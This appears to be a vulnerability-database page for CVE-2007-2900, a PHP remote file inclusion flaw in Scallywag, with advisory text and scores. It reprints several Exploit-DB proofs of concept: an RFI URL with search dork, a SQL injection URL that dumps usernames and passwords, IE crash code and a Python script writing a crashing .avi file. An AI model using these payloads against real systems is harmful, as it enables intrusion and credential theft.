CVE-2007-2900
published 2007-05-30CVE-2007-2900: Multiple PHP remote file inclusion vulnerabilities in Scallywag 2005-04-25 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.80%
84.7th percentile
Multiple PHP remote file inclusion vulnerabilities in Scallywag 2005-04-25 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to template.php in (1) skin/dark/, (2) skin/gold/, or (3) skin/original/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scallywag.org | scallywag | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-m7r6-qj76-m5p5: Multiple directory traversal vulnerabilities in Scallywag 2005-04-25 allow remote attackers to include and execute arbitrary local files via a
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2007-2960 [MEDIUM] GHSA-m7r6-qj76-m5p5: Multiple directory traversal vulnerabilities in Scallywag 2005-04-25 allow remote attackers to include and execute arbitrary local files via a
Multiple directory traversal vulnerabilities in Scallywag 2005-04-25 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skin_name parameter to template.php in (1) skin/dark/, (2) skin/gold/, or (3) skin/original/, a different vector than CVE-2007-2900. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
GHSA
GHSA-h48c-63vf-pv25: Multiple PHP remote file inclusion vulnerabilities in Scallywag 2005-04-25 allow remote attackers to execute arbitrary PHP code via a URL in the path
ghsa_unreviewed·2022-05-01
CVE-2007-2900 [MEDIUM] CWE-94 GHSA-h48c-63vf-pv25: Multiple PHP remote file inclusion vulnerabilities in Scallywag 2005-04-25 allow remote attackers to execute arbitrary PHP code via a URL in the path
Multiple PHP remote file inclusion vulnerabilities in Scallywag 2005-04-25 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to template.php in (1) skin/dark/, (2) skin/gold/, or (3) skin/original/.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
exploitdb·2008-09-28
CVE-2007-5348 Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
---
ef\:* { behavior: url(#default#VML); }
MS08-052: GDI+ Vulnerability
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
# milw0rm.com [2008-09-28]
Exploit-DB
phpAuction 3.2.1 - 'item.php' SQL Injection
exploitdb·2008-06-21
CVE-2008-2900 phpAuction 3.2.1 - 'item.php' SQL Injection
phpAuction 3.2.1 - 'item.php' SQL Injection
---
#########################################################
#
# phpauction-gpl Version3.2 Version SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#========================================================
# HomE script : http://www.phpauction.net
#
# Demo : http://www.phpauction.net/phpauction-gpl-3.2/
#
#
# DorK : Copyright 2007, PHPAUCTION.NET
#
#
##########################################################
Exploit:
http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
Exploit-DB
Scallywag - 'template.php?path' Remote File Inclusion
exploitdb·2007-05-23
CVE-2007-2900 Scallywag - 'template.php?path' Remote File Inclusion
Scallywag - 'template.php?path' Remote File Inclusion
---
##############################################################################################
#Scallywag <= Remote File Inclusion Vulnerability #
# #
#Dork:"Powered by Scallywag" #
# #
# #
##############################################################################################
#Vuln Code #
# #
#ERROR1:skin/dark/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG1: #
# #
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR2:skin/gold/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG2: #
# #
#Example1:http://victim
Exploit-DB
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
exploitdb·2007-02-05
CVE-2007-0811 Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
---
Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
AmesianX, RC_No1 in powerhacker.net (
Exploit-DB
Microsoft Windows Explorer - '.AVI' File Denial of Service
exploitdb·2007-01-24
CVE-2007-0562 Microsoft Windows Explorer - '.AVI' File Denial of Service
Microsoft Windows Explorer - '.AVI' File Denial of Service
---
print "-----------------------------------------------------------------------------------"
print "Explorer.exe version 6.0.2900.2180 .avi file Denial of Service"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Tested on Windows XP Professional SP2 all patched"
print "right click of the mouse on the file to see Explorer.exe die"
print "-----------------------------------------------------------------------------------"
fileOut = open('die.avi','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()
# milw0rm.com [2007-01-24]
No writeups or analysis indexed.
http://osvdb.org/38142http://osvdb.org/38143http://osvdb.org/38144http://www.vupen.com/english/advisories/2007/1933https://exchange.xforce.ibmcloud.com/vulnerabilities/34469https://www.exploit-db.com/exploits/3972http://osvdb.org/38142http://osvdb.org/38143http://osvdb.org/38144http://www.vupen.com/english/advisories/2007/1933https://exchange.xforce.ibmcloud.com/vulnerabilities/34469https://www.exploit-db.com/exploits/3972
2007-05-30
Published